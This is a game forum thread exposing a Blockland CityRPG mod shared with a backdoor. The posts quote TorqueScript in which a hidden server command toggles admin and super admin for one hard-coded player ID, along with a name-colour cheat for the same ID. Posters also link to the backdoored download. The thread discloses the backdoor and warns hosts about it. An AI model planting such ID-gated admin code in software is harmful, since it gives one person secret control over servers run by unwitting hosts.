Author Topic: Aoki - Distributing CityRPG with a backdoor, Super admin on all servers using it (Read 32442 times)

Pecon · October 01, 2013, 06:34:39 PM

I've seen quite a few more CityRPG's popping up lately. First thing that came to mind was that all these servers seemed to have been using similar versions of the mod (Notable: A job named "Aoki Cosplayer" available). I had also noticed that Aoki seemed to have been admin on all these servers, it wasn't suspicious at first since I thought that maybe Aoki was just popular among the people who liked hosting those things. But today I saw Aoki and asked if he had been the one distributing the mod.

Okay, that was interesting. So I asked him if I could have a look at it. He replied that he did not want to give out the 'updated version', but I managed to get him to post a link to whatever he had been giving out before. (The server had eval, so the link was posted using it. They also disabled the admin shields using eval a few minutes before.)

Link: http://www.mediafire.com/download/1puibcsyocdc4xx/Gamemode_CityRPG.zip
Mirror: http://pecon.us/storage/Gamemode_CityRPG.zip

Looking through the code, I found exactly what I suspected I would find.

Quote from: Lines 3211 to 3229

function serverCmdtogAdmin(%client)
{
   if(%client.bl_id == 7395) //7395 is Aoki's BL_ID
   {
      %client.isAdmin = (%client.isAdmin ? 0 : 1);
      %client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
      commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
      messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

      if(%client.isAdmin)
      {
         messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
      }
      else
      {
         messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
      }
   }
}

There was also another 'cheat' he had put in, which was a custom shapeName color (Actually gave a significant advantage in game).

This is a little less serious, but look at this.

This isn't really harmful, but I think intent was behind that. (And I am pretty sure that the eval access was achieved via the exploit in the mod, but he could have already been an admin)

On a slightly unrelated note, Visolator was acting shifty as forget and had made his own silent eval function so he could eval without anyone knowing. I don't know if he was up to anything, but it was shifty.

Ad Bot · Advertisement

Zanaran2 · October 01, 2013, 06:37:14 PM

Looks like we have another spencer in here.

Blockzillahead · October 01, 2013, 06:38:15 PM

Key deactivation worthy.

Wispfire · October 01, 2013, 06:38:39 PM

I do remember him talking about "Added bits" to the cityRPG sometime, I had an idea it was an auto-adminer.

zenloth · October 01, 2013, 06:44:23 PM

I can verify that it had backdoor, in-case the file gets removed. (First thing I assumed it'd be).

He was also disabling add-ons via eval because he "didn't like them".

Pecon · October 01, 2013, 06:46:15 PM

Quote from: zenloth on October 01, 2013, 06:44:23 PM

I can verify that it had backdoor, in-case the file gets removed. (First thing I assumed it'd be).

I posted a mirror to the file to ensure it would stay available for inspection.

Acerblock · October 01, 2013, 06:48:01 PM

Key revoke. Good bye.

Zanaran2 · October 01, 2013, 06:51:17 PM

Quote from: Pecon on October 01, 2013, 06:34:39 PM

Quote from: Lines 3211 to 3299
function serverCmdtogAdmin(%client)
{
if(%client.bl_id == 7395) //7395 is Aoki's BL_ID
{
%client.isAdmin = (%client.isAdmin ? 0 : 1);
%client.isSuperAdmin = (%client.isSuperAdmin ? 0 : 1);
commandtoclient(%client, 'setAdminLevel', %client.isAdmin);
messageAll('MsgClientJoin', '', %client.name, %client, %client.bl_id, %client.score, 0, %client.isAdmin, %client.isSuperAdmin);

if(%client.isAdmin)
{
messageAll('MsgAdminForce','\c2%1 has Re-Admined himself.', %client.name);
}
else
{
messageAll('MsgAdminForce','\c0%1 has De-Admined himself.', %client.name);
}
}
}

Aware · October 01, 2013, 06:52:28 PM

How did he even distribute it?

Zanaran2 · October 01, 2013, 06:54:15 PM

Quote from: Aware on October 01, 2013, 06:52:28 PM

How did he even distribute it?

Insensitive hosts who didn't even bother to check the code and let Aoki screw up their server
Pic related:

Note how he uses eval to admin himself and deadmin the host (Outpact)

Advanced Bot · October 01, 2013, 06:56:04 PM

Oh no. This isn't good. I just realized that he put more of his ID in the code as well.

Code: [Select]

function player::setShapeNameColor(%this, %color)
	{
		if(isObject(%client = %this.client) && isObject(%client.player) && %this.getState() !$= "dead")
		{
			if(%client.bl_id != 7395)
			{
				if(%client.getWantedLevel())
					%color = "1 0 0 1";
				else if(CityRPGData.getData(%client.bl_id).valueReincarnated)
					%color = "1 1 0 1";
				else if(%client.isAdmin == 1)
					%color = "1 0 0 1";
				else if(%client.isSuperAdmin == 1)
					%color = "0 1 0 1";
				else
					%color = "1 1 1 1";
			}
			if(%client.bl_id == 7395)
				%color = "0.621495 0.859813 0.976636 1";
		}
		
		parent::setShapeNameColor(%this, %color);
	}

Pecon · October 01, 2013, 06:58:49 PM

]

Quote from: Advanced Bot on October 01, 2013, 06:56:04 PM

Oh no. This isn't good. I just realized that he put more of his ID in the code as well.

[quote author=Pecon link=topic=242583.msg6937744#msg6937744 date=1380670479
There was also another 'cheat' he had put in, which was a custom shapeName color (Actually gave a significant advantage in game).
[/quote]

Advanced Bot · October 01, 2013, 07:01:18 PM

Quote from: Pecon on October 01, 2013, 06:58:49 PM

][quote author=Pecon link=topic=242583.msg6937744#msg6937744 date=1380670479
There was also another 'cheat' he had put in, which was a custom shapeName color (Actually gave a significant advantage in game).

Yea. Well hopefully Outpact can fully remove him out of the coding. Now I know that he is just bad news.

I will mind as well copy this mod and remove those things and make sure everytime outpact restarts Aoki cannot add himself.

blueblur121 · October 01, 2013, 07:03:06 PM

Quote from: Advanced Bot on October 01, 2013, 06:56:04 PM

Oh no. This isn't good. I just realized that he put more of his ID in the code as well.

Code: [Select]
function player::setShapeNameColor(%this, %color) { if(isObject(%client = %this.client) && isObject(%client.player) && %this.getState() !$= "dead") { if(%client.bl_id != 7395) { if(%client.getWantedLevel()) %color = "1 0 0 1"; else if(CityRPGData.getData(%client.bl_id).valueReincarnated) %color = "1 1 0 1"; else if(%client.isAdmin == 1) %color = "1 0 0 1"; else if(%client.isSuperAdmin == 1) %color = "0 1 0 1"; else %color = "1 1 1 1"; } if(%client.bl_id == 7395) %color = "0.621495 0.859813 0.976636 1"; } parent::setShapeNameColor(%this, %color); }

I don't know torquescript, but I think that forgets anyone who kills aoki? Am I wrong? Looks like it raises their wanted level all the way.

Pecon · October 01, 2013, 07:04:03 PM

Quote from: blueblur121 on October 01, 2013, 07:03:06 PM

I don't know torquescript, but I think that forgets anyone who kills aoki? Am I wrong? Looks like it raises their wanted level all the way.

No, it makes his name color in-game unique and unchanging. It messes with the gameplay because normally criminal players will have a red name.